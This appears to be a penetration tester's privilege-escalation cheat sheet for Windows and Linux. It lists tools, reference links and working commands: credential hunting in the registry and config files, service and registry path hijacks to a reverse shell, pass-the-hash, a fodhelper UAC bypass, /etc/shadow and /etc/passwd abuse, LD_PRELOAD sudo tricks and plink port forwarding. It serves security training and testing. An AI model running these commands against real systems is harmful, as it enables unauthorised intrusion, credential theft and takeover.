Privilege Escalation

Shellin's for show, Rootin's for dough

General Privilege Escalation Guides

• HackTricks. If I had to take one link with me into a pentest, this would be it. Written by the creator of WinPEAS and LinPEAS, it is THE guide for PrivEsc, and one of the best for everything else.

• Vulnhub PrivEsc Cheatsheet

• PrivEsc for MySQL https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/

• https://toshellandback.com/2015/11/24/ms-priv-esc/

• https://www.ired.team/offensive-security/code-execution

• https://www.ired.team/offensive-security/code-injection-process-injection

• https://www.ired.team/offensive-security/privilege-escalation

• Conda's Priv Esc Video Playlist

• Metasploit/Empire PrivEsc - PTFM pg. 31

Dont forget to to try any harvested credentials!

Windows Privilege Escalation

Guides and Reference

• HackTricks: Windows

• PayloadsAllTheThings/Windows-PrivilegeEscalation

• https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

• https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842

• https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

• https://rahmatnurfauzi.medium.com/windows-privilege-escalation-scripts-techniques-30fa37bd194

• https://www.fuzzysecurity.com/tutorials/16.html

• https://www.greyhathacker.net/?p=738

• http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation

• https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/

• https://xapax.github.io/security/#attacking_active_directory_domain/local_privilege_escalation/local_privilege_escalation/

Methodology

Basics

• Goal: Gain a shell as Administrator or SYSTEM

• SYSTEM is a default service account with the highest level of priv

• Resources - access/action set by ACL

  • Each ACL is made up of ACEs: relationship between an object/user, and a right.

• Administrator Shells

  • Easy way: msfvenom

  • Admin-> SYSTEM use PSEXEC

Enumeration for PrivEsc

• Check Whoami and net user [user]

• Check for easy unpatched vulnerabilities

>wmic qfe get Caption,Description,HotFixID,InstalledOn

• Run winPEAS

  • > reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1 (enables colors on command prompt)

• Run Seatbelt

  • .\Seatbelt.exe all

• Check for

  • Ability to odify a service

  • Ability to start/stop service

  • Interesting files that might contain creds

• Try Payload all the things enumeration commands

  • Create checklist of the things tyou need to make an exploit work

Order of Techniques

• Registry and service exploits first

• Kernel exploits last

PrivEsc Tools

• WinPEAS (The Go-To) - These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily.

• SeatBelt - Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.

• Windows Exploit Suggester Next Gen - WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities.

• Sherlock and Watson - look for missing patches and KBs

• Accesschk.exe with the accept EULA flag - a Microsoft Sysinternals tool that is great for auditing privileges on your systems, and for auditing privileges on others’ systems. This version is a standalone utiltility with the older code that allows you to auto accept the EULA flag.

• PrintSpoofer - From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019.

• Rattler - Rattler is a tool that automates the identification of DLL's which can be used for DLL preloading attacks.

• SharpImpersonation - A User Impersonation tool - via Token or Shellcode injection

  • https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/

Potato Exploits

• Rotten Potato - New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools. Leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges.

• Juicy Potato - Upgraded and Weaponized verison of RottenPotatoNG

• Sweet Potato - A collection of various native Windows privilege escalation techniques from service accounts to SYSTEM

• Rogue Potato - Just another Windows Local Privilege Escalation from Service Account to System.

  • https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/

• RemotePotato0 - Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.

• MultiPotato - This is just another Potato to get SYSTEM via SeImpersonate privileges.

• Hot Potato

  • Attack that uxses spoofing and NTLM relay to gain SYSTEM Priv

  • Tricks windows to authenticating as the SYSTEM user to a fake HTTP server with NTLM.

  • Potato.exe exploit code binary exists!!!

  • Dont forget to compile the code wiht your reverse shell details

• DCOMPotato - Some Service DCOM Object and SeImpersonatePrivilege abuse.

• Token Impersonation

  • Cannot log directly into service accounts

  • Rotten Potato - Service accounts to intercept SYSTEM ticket and use it to impersonate SYSTEM user

  • Service accounts

    • Generally configured with SeImpersonate/SeAssignPrimaryToken privileges

    • This allows the account to impersonare the access tokens of other users including SYSTEM

    • Any user with these privs can run teh toeken impersonation exploits found.

  • Juicy Potato - https://github.com/ohpe/juicy-potato

  • Rogue Potato - https://github.com/antonioCoco/RoguePotato

  • PrintSpoofer - https://github.com/itm4n/PrintSpoofer

Stored Credentials

• Several features store passwords insecurely, especially in the registry

• https://www.hackingarticles.in/windows-privilege-escalation-stored-credentials-runas

Creds in Registry

Stored Creds in Registry

• Seach the registry for keys and values that contain “password”

  • >reg query HKLM /f password /t REG_SZ /s

  • >reg query HKCU /f password /t REG_SZ /s

• >.\winPEADany.exe quiet filesinfo userinfo

• Query Autologins

  • >reg query “HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

• Query Putty sessions

  • >reg query “HKCU\Software\SimonTatham\PuTTY\Sessions” /s

• Spawn a shell with new credentials

  • #winexe -U ‘admin%password’ //[targetip] cmd.exe

  • #winexe -U ‘admin%password’ --system //[targetip] cmd.exe

Saved Creds

Saved Creds

• Windows allows users to save thier credentials to the system for use with the runas command

• >.\winPEASany.exe quiet cmd windowscreds

• >cmdkey /list

  • >run savecred.bat to refresh list of saved credentials

• >runas /savecred /user:admin C;\reverse.exe

Config Files

Config files

• Some config files will store admin creds

• Unattend.xml - for automated setup of windows

• Search for filenames: sysprep.inf, unattended.xml, sysprep.xml

• Recuresively search for files in the current dir with “pass” in the name, or ending in .config

  • > dir /s *pass* == *.config

• Recuresively search for files in the current dir with “password” in the name, and end in .xml, .ini, or ,txt

  • > findstr /si password *.xml *.ini *.txt

• >.\winPEASany.exe quiet cmd searchfast filesinfo

SAM

SAM

• This is where windows stores password hashes

• They are encrypted with a key that can be found in a file named SYSTEM

• If you can read both SAM and SYSTEM you can extract the hashes.

  • Located in C:\Windows\System32\config

  • These are locked while windows is running

  • Backups might exist in C:|windows\Repair or C:\Windows\System32\config\RegBack

• pwdump tool - part of creddump7

• Look at the NTLM hash - If the last section starts with “31d6c” this indicates the password is empty, or the accoutn is disabled.

• Crack the admin user hash with hashcat

Pass-The-Hash

• Passing the hash

  • Windows accepts hashes instead of passwords for a number of services.

  • We can use pth-winexe to spawn a command prompt using the admin users pw hash

  • #pth-winexe -U " [entire hash including LM hash] //[target] cmd.exe

Service Exploits

Enum Cmds

First lets get a list of services that are running on the target and thier permissions

• >accesschk.exe -uwcqv *

• >accesschk.exe -uwcqv “Authenticated Users” *

• > Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

• >sc.exe qc [name] -query service config

• >sc.exe query [name] -query service status

• >sc.exe config [name] [option]= [value] -modify config option of a service

• >net start/stop [name] -start/stop a servic

Insecure Properties

Insecure Service Properties

• Each service has an ACL to define certain permissions

• Check: you must be able to change a service AND stop/start the service

• >.\winPEASany.exe quiet servicesinfo

• Verify with accesschk

  • .\accesschk.exe /accepteula -uwcqv user [service]

• >sc qc [service]

• If you can change the service, try changing the BINARY_PATH_NAME to that over your reverse shell

  • >sc config [service] binpath= “\”C:\PrivEsc\reverse.exe\""

• >net start [service]

Unquoted Paths

Unquoted Service Paths

• Executables in windows can be run without their extensions

• Some executables take arguments separated by spaces

• Look for paths with spaces and no quotes

• Check permissions for the service

• Check for write permissions for each directory in the binary path

• Create a reverse shell executable and name it to the file that would be inserted into the unquoted path.

• PTFM: Unquoted Service Paths - pg. 32

Insecure Exe

Insecure Service Executables

• If the original service executable is modifiable, we can simply replace it with our reverse shell

• Check for called files by services that are writable.

• Double check that you can start/stop the service

• Copy/overwite the reverse shell file on top of the weak file

DLL Hijack

DLL Hijacking

• Often an exe will try to load functionality from a library called a DLL

• What ever functionality the DLL gives, will be executed at the same priv as the service that loaded it.

• If the DLL has an absolute path, it might give priv esc if its writeable by our user.

• More common: if a DLL is missing and we have write access to a directory within the PATH that windows searches

• Might require manual enumeration

• Copy the target exe to your host dev and analyze the DLL

  • Run procmon > ctl+L > add new filter for your target dll

  • Look for Results “NAME NOT FOUND” to give the DLL location of the target

  • Create a reverse shell in a .dll named after the called dll file.

  • Copy/paste it to your target and place it in the Temp Directory

• DLLHijackingScanner - This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification.

  • https://securityonline.info/dllhijackingscanner-bypassing-uac-using-dll-hijacking/

• Rattler - Rattler is a tool that automates the identification of DLL's which can be used for DLL preloading attacks.

  • https://sensepost.com/blog/2016/rattleridentifying-and-exploiting-dll-preloading-vulnerabilities/

• DLLHijackTest - DLL and PowerShell script to assist with finding DLL hijacks

• Robber - Robber is open source tool for finding executables prone to DLL hijacking

  • https://hakin9.org/robber-is-open-source-tool-for-finding-executables-prone-to-dll-hijacking/

• https://www.blackhillsinfosec.com/digging-deeper-vulnerable-windows-services/

• https://attack.mitre.org/techniques/T1574/001/

• https://github.com/wietze/HijackLibs - Project for tracking publicly disclosed DLL Hijacking opportunities.

• DLL Search Order Hijacking - PTFM: - pg. 25

Registry Exploits

Weak Registry Permissions

Weak Registry Permissions

• Registry stores entries for each service

• Since entries can have ACL's, they can be mis-configured and modify a services config.

• Locate a weak registry entry > verify permissions with accesschk

• NT AUTHORITY\INTERACTIVE - user group that all users are apart of

• Overwrite the image path value in the registry, so the called executable in the service, points to your reverse shell

  • >reg add HKLM\SYSTEM\CurrentControlSet\Services\[service] /v ImagePath -t REG_EXPAND_SZ /d C:\PrivEsc\Reverse.exe /f

Autoruns

Autoruns are configed in the registry. If you can write to an Autorun executable, you may get priv esc on restart.

• >.\winPEASany.exe quiet applicationsinfo

• >reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

• Paste reverse shell program over vul executable

• https://www.hackingarticles.in/windows-privilege-escalation-boot-logon-autostart-execution-startup-folder/

• Windows Privilege Escalation: Logon Autostart Execution (Registry Run Keys)

AlwaysInstallElevated

Windows Privilege Escalation (AlwaysInstallElevated)

• MSI files are used to install apps. They run with the permissions of the user trying to install. You can run these with admin (elevated) privs. We can use this by creating a malicious MSI file containing a reverse shell

• Check 2 registry settings. These must be present and enabled

  • HKLM\SOFTWARE\POLICIES\Microsoft\Windows\Installer

  • HKCU\SOFTWARE\POLICIES\Microsoft\Windows\Installer

• >.\winPEASany.exe quiet windowscreds

• > reg query HKCU\SOFTWARE\POLICIES\Microsoft\Windows\Installer /v AlwaysInstallElevated

• Create a reverse shell in the .msi format

• https://github/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/always_install_elevated.rb

Other Exploits And Techniques

Scheduled Tasks

• Admins can config tasks to run as other users or SYSTEM

• List all tasks your current user can see

  • > schtassk /query /fo LIST /v

  • PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*} | ft TaskName,TaskPath,State

• Check tasks and called files for when/if they are executed

  • >echo C:\reverse.exe >> [scheduled executable]

• Schedule a task that runs everytime the system starts

  • > schtasks /create /tn [taskname] /tr [Taskrun] /sc onstart

• Schedule a task that runs when a user logs on.

  • > schtasks /create /tn [taskname] /tr [Taskrun] /sc onlogon

• Schedule a taks that runs when the system is idle

  • > schtasks /create /tn [taskname] /tr [Taskrun] /sc onidle /i [1-999]

• Schedule a task that runs one

  • > schtasks /create /tn [taskname] /tr [Taskrun] /sc once /st {HH:MM}

• Schedule a task that runs with system permissions

  • > schtasks /create /tn [taskname] /tr [Taskrun] /sc onlogon /ru System

• Schedule a task that runs on a remote computer

  • > schtasks /create /tn [taskname] /tr [Taskrun] /sc onlogon /s [PC name]

UAC Bypass

• fodhelper.exe attack

  • PTFM: UAC Bypass - pg. 33

  • This binary runs as high integrity on windows 10. We can leverage it to bypas UAC by the way it uses the Registry.

  • Run C:\Windows\System32\fodhelper.exe -> manage optional features -> inspect application manifest with sigcheck

  • > cd C:\Tools\privilege_escalation\SysinternalsSuite

  • > sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe

  • next we look at fodhelper.exe while running procmon

  • Will generate a “NAME NOT FOUND” error and indicate an potential exploitable registry entry

  • fodhelper.exe attemtps to query HKCU:\Software\Classes\ms-settings\shell\open\command, which does not appear to exist

  • > REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command

  • > REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ

  • > REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f

• Via Event Viewer

  • PTFM: UAC Bypass - pg. 33j

Kernel Exploits

• Can be leveraged to perform actions as SYSTEM

• Enumerate version and find matchign exploits > compile and execute

• Tools

  • Windows Exploit suggester

  • Precompiled exploits - https://github.com/Secwiki/windows-kernel-exploits

  • Watson - rasta-mouse - https://github.com/rasta-mouse/Watson

• Identification

  • >whoami

  • >systeminfo

  • > wmic qfe get Caption,Description,HotFixID,InstalledOn #will list all installed patches

• Exploit Packs

  • https://github.com/abatchy17/WindowsExploits

  • https://github.com/SecWiki/windows-kernel-exploits

  • https://github.com/egre55/windows-kernel-exploits

  • https://github.com/padovah4ck/CVE-2020-0683

Misc

• Windows Privilege Escalation: Boot Logon Autostart Execution (Startup Folder)

• Windows Privilege Escalation: SeImpersonatePrivilege

• Windows Privilege Escalation: DnsAdmins to DomainAdmin

• Windows Privilege Escalation: SeBackupPrivilege

• Windows Privilege Escalation (Insecure File Permissions)

Insecure GUI

• Older windows versions can allow certain GUI apps to run with admin priv

• https://www.hackingarticles.in/windows-privilege-escalation-insecure-gui-application/

Vulnerable Apps

• Start up apps exist under each user as well as windows has a dir for all users

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

  • Files in here must be shortcut files

  • https://www.hackingarticles.in/windows-privilege-escalation-boot-logon-autostart-execution-startup-folder/

• Installed Apps

  • Look for exploits for specific installed applications via explotidb or searchsploit

  • Use tasklist or seatbelt

    • >.\seatbelt.exe NonstandardProcesses

Port Forwarding

• Sometimes its easier to run code on kali but the target is only listening on an internal port

• Enter Plink.exe

• winexe port connects with port 445

• Setup

  • /etc/ssh/sshd_config - make usre PermitRootLogin is set to Yes

  • #service ssh restart

• >.\plink.exe root@[attackerIP] -r 445:127.0.0.1:445

  • Forward remote port to local port

• Now we run winexe at our local port on the attacker box, and plink sends it to the target, posing as an internal port

  • #winexe _u ‘admin%password’ //127.0.0.1 cmd.exe

Linux Privilege Escalation

Guides and Reference

• HackTricks - Linux

• https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md

• https://in.security/lin-security-practise-your-linux-privilege-escalation-foo/

• https://www.hackingarticles.in/linux-for-pentester-find-privilege-escalation/

• https://payatu.com/guide-linux-privilege-escalation

• https://www.youtube.com/watch?v=dk2wsyFiosg

• https://resources.infosecinstitute.com/topic/privilege-escalation-linux-live-examples/#gref

• https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html

• https://xapax.github.io/security/#post_exploitation/privilege_escalation_-_linux/

PrivEsc Tools

• LinPEAS - These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily.

• LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks

• LSE - Linux Smart enumeration, Linux enumeration tools for pentesting and CTFs

• Unix Privesc Check - Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivilged users to escalate privileges to other users or to access local apps (e.g. databases).

• Linux Exploit Suggester 2 - Next-Generation Linux Kernel Exploit Suggester

• SUDO Killer - Linux Privilege Escalation through SUDO abuse.

Methodology

• Check user

• Run enum scripts at increasing levels

• Run manual commands

• Check user home dir

  • /var/backup, /var/log, history files

• Try quickest methods first

• Check internal ports

• Use Kernel exploits as a last resort

Enumerate Permissions

• Users

  • Accounts in /etc/passwd

  • password hashes in /etc/shadow

  • identified by a UID

  • root = UID 0

  • 3 types

    • Real - defined in /etc/passwd. who they actually are

    • Effective - when executing a process as another user, thier effective ID is set to that user's real ID.

      • Most Access Control decisions

      • whoami

    • Saved - used to ensure SUID processes can temporarily switch a user's effective ID back to thier Rreal ID and back again without losing track of the original effective ID

• Groups

  • /etc/group

  • Primary and multiple secondary groups

  • Default primary group is same name as user account

• Files/Dir

  • Have a single owner and a group

  • Permissions:read write execute

  • 3 permission sets: owner, group, and all others

• Special permissions

  • setuid (SUID) bit - When set, files will get executed with privileges of the file owner

  • setgid (SGID) bit - When set on a file , files will get executed with the permissions of the file group

    • When set on a directory, files created in that directory will inherit the group of the directory itself

• Viewing permission

  • #ls -l /file/path

  • First 10 characters are the permissions on the file

  • First character is the type: “-” for file, “d” for directory

  • SUID/SGID permissions are represented by an “s” in the execute position

Techniques

Pwds and Keys

• Service PWs may be stored in plain text in config files

• History files may contain a password used as part of a command

  • #ls -a -> look for _history files

• Config files

  • opnevpn files -> auth-user-pass option

• SSH Keys - can be used in leu of passwords

Weak File Permissions

• /etc/shadow

  • Readable - copy and crack the Root user hash

  • writeable - copy and edit the shadow file with new root password

• /etc/passwd

  • For backwards compatibility, if the second field of a user row is a passwrod hash, it takes precedent over /etc/shadow

  • Either replace the password for root, or append a new user with root permissions.

  • Delete the x in the second field reads as if there is no password for user

• Backups

  • Some can be readable to gather interesting files

Sudo Abuse

• Rules in /etc/sudoers

• Useful commands

  • #sudo -u <username> <program>

  • # sudo -l (show what you can run)

  • @ sudo -s

  • #sudo -i

  • #sudo /bin/bash

  • #sudo passwd

• Shell escape sequences

  • https://gtfobins.github.io/

  • search for the commands/binaries you can run as sudo, then pass arguements that force a new root shell

• Abusing intended functionality

  • Read/write to files owned by root

  • EX apache2 - it will try to read the first line of any file passed as an arguement.

    • #sudo apache2 -f /etc/shadow

• Environment variables

  • Programs run through sudo can inherit the environment variables from the user's environment

  • In the /etc/sudoers file, The options env_reset and env_keep options are available. These are displayed wiht #sudo -l

  • LD_PRELOAD variable that can be set to the path of a shared object file (.so)

    • By creating a custom shared object and an init() funciton, we can execute code as soon as the object is loaded

    • Will not work if real userID is different from effectiveID. ALso, sudo must have env_keep option

    • #sudo LD_PRELOAD=<path to created shared object> <command you can run as sudo>

  • LD_LIBRARY_PATH

    • set of directories where shared libraries are searched for first

    • Print shared libraries uxsed by a program

      • #ldd /usr/sbin/apache2

    • By creating a shared library wiht the same name as one used by a program, and setting the LD_LIBRARY_PATH to its parent dir, the program will load our shared library instead.

• Sudo Caching

  • PTFM: Sudo Caching - pg. 93

Cron Jobs

• Run at the security level of the user that owns them

• Default run with /bin/sh with limited envi variables

• Cron table files (crontabs) store config for cron jobs

• Cronjobs are located in /var/spool/cron/ or /var/spool/cron/crontabs/

• System wide crontab is located in /etc/crontab

• If we can write to a program or script that gets run with a cronjob, we can replate it with our own code

• PATH envi variable

  • default set to /usr/bin

  • Can be overwritten in the crontab file

  • If a cronjob script/program does nto use absolute path and one of the path dir is user writeable, you can create a program or script with the same name as the cronjob

• Wildcard

  • When a wildcard char (*) is provided to a command as par tof an arguement, the shell will first perform filename expansion (globbing) on the wildcard

  • this process replaces the wildcard with a speace-separated list of the file and directory names in the current directory

  • Can create filenames that match cmd line options like “--help”

Service Exploits

• #ps aux | grep “^root” Show all processes runnign as root

• #netstat -nl Show all actice connections (look for services)

• Try to ID verison number and research for exploits

  • #<program> -v or --version show version number

  • #dpkg -l | grep <program>

  • #rpm -qa | grep <program>

• Some processes running as root may be bound to an internal port through which it communicates

  • If it cannot be run locally on the target machine, the port can be forwarded using ssh to your local machine

  • $ssh -R <local port>:127.0.0.1:<service-port> <username>@<local-machine>

  • Run netstat to see what services are listening to 127.0.0.1:<port>, then use port forwarding to send to the target port

SUID/SGID Executables

• Find files with the SUID/SGID bit set

  • #find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec la -l {} \; 2> /dev/null

  • Can use shell escape sequences on SUID/SGID files

  • PTFM: BSUID and SGID - pg. 93

• Known Exploits - certain programs use SUID files as part of thier process or install.

  • Search for these! Look for exim!

• Shared Object Injection

  • Use strace to track system calls from a program to any shared objects it is trying to call

  • If we can write to the location, we cna create an object that will run wiht the program

  • Create a c file that creates a file

  • Compile the c file

    • >gcc

• PATH envi variable

  • If a program tries to execute another by only using the program and and not the absolute path, we can tell the shell where to look

  • Finding vulnerbable programs

    • Those sub-secuted files are often mentioned as a string in the program.

    • Run strings on the host executable

    • Can also use strace or ltrace

    • #strace -v -f -e execve <command> 2>&1 | grep exec

    • Attack

      • Create new shell executable names the sub-executed service

      • Set the path varibale to the path of the newly created executable

      • #PATH=.:$PATH <host file to execute>

• Abusing shell features

  • Older versions <4.2-048 can define user functions with an absolute path name

    • These can be exported and can take precedence over the actual executable being called

    • #function <service oyu want to impersonate> { /bin/bash -p; )

    • #export -f /user/sbin/service

  • Debugging mode which can be enabled with the -x command or by modifying SHELLOPTS to inclide xtrace

    • SHELLOPTS is read only, but the env command allows SHELLOPS to be set

    • When in debugging mode, Bash uses the env var PS4 to display an extra prompt for debug statements. This variebl can contain embedded commands

    • If an SUID file runs another via bash, those envi variables can be enherited.

    • This does not work on bash past 4.4

• Linux Privilege Escalation using SUID Binaries

NFS

• Shares configed under /etc/exports

  • created files inherit remote users UID and GUID even if they do not have an account locally

• Commands

  • # showmount -e [target]

  • # nmap -sV -script=nfs-showmount [target]

  • #mount -o rw,vers=2 [target]:[share] [local dir]

• Linux Privilege Escalation using Misconfigured NFS

Kernel exploits

• uname -a Enumerate Kernel verison

• Find matching exploit, compile, and run

  • #searchsploit [option] [option]

  • #linux-exploit-suggester-2.py

  • # uname -ar

  • # cat /etc/issue

  • # cat /etc/*-release

  • # cat /etc/lsb-release # Debian based

  • # cat /etc/redhat-release # Redhat based

• https://github.com/spencerdodd/kernelpop

• https://github.com/SecWiki/linux-kernel-exploits

• https://github.com/lucyoa/kernel-exploits

• https://github.com/bcoles/kernel-exploits

• PTFM: Dirty Cow PrivEsc pg. 92

Misc

• Editing /etc/passwd File for Privilege Escalation

• Linux Privilege Escalation: Python Library Hijacking

• Linux Privilege Escalation using LD_Preload

• Linux Privilege Escalation Using PATH Variable

• Linux For Pentester: socat Privilege Escalation

• Linux for Pentester: scp Privilege Escalation

• Linux For Pentester: tmux Privilege Escalation

• Linux for Pentester: ed Privilege Escalation

• Linux for Pentester: sed Privilege Escalation

• Linux for Pentester: pip Privilege Escalation

• Linux for Pentester: git Privilege Escalation

• Linux for Pentester: cp Privilege Escalation

• Linux for Pentester: Taskset Privilege Escalation

• Linux for Pentester: Time Privilege Escalation

• Linux for Pentester: xxd Privilege Escalation

• Linux for Pentester : ZIP Privilege Escalation

• Linux for Pentester: APT Privilege Escalation

• Linux for Pentester: CAT Privilege Escalation

• Linux for Pentester: Find Privilege Escalation

• Linux for Pentester: Wget Privilege Escalation

Specific Vulnerabilities

CVE-2021-36934 - HiveNightmare

• https://www.hackingarticles.in/windows-privilege-escalation-hivenightmare/